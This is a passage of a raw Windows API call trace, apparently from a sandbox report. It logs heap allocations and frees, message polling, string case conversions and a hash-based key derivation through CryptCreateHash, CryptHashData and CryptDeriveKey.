wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.635] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0164.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.637] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.639] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.639] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.639] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.639] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.639] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.640] CryptHashData (hHash=0xaa55e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.640] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.641] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.641] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.641] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.641] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.641] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.641] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.641] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.642] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.642] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.642] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.642] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.642] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.643] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: 